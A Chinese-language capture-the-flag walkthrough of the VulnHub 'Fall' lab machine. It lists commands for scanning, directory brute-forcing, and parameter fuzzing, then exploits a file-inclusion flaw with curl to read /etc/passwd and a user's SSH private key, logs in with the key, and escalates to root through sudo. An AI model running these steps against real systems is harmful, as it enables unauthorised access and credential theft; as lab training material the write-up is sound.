虚拟机信息:
虚拟机下载地址:https://www.vulnhub.com/entry/digitalworldlocal-fall,726/
虚拟机简介:作者最喜欢的季节,因为它是收获的季节
目标:1个flag
级别:中级
arp-scan 192.168.207.0/24
nmap -A -sS -sV -v -p- 192.168.207.131
查看开放22、80、111、139、443等多个端口
发现存在一个账号qiu
查看CMS为 CMS Made Simple ,版本为2.2.15
搜索漏洞,发现XSS和文件上传,需要认证成功后才能执行
gobuster dir -u http://192.168.207.131 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt
提示需要在get请求中传入参数
测试需要传参的内容,获取到参数为file
ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.207.131/test.php?FUZZ=/etc/passwd' -fs 80
curl http://192.168.207.131/test.php?file=/etc/passwd
查看存在qiu账号,并且允许登录
curl http://192.168.207.131/test.php?file=/home/qiu/.ssh/id_rsa
curl http://192.168.207.131/test.php?file=/home/qiu/.ssh/id_rsa >> id_rsa
chmod 600 id_rsa
ssh -i id_rsa [email protected]
remarkablyawesomE
cat .bash_history
该用户拥有所有的sudo权限
sudo -l
sudo su
cd /root
cat proof.txt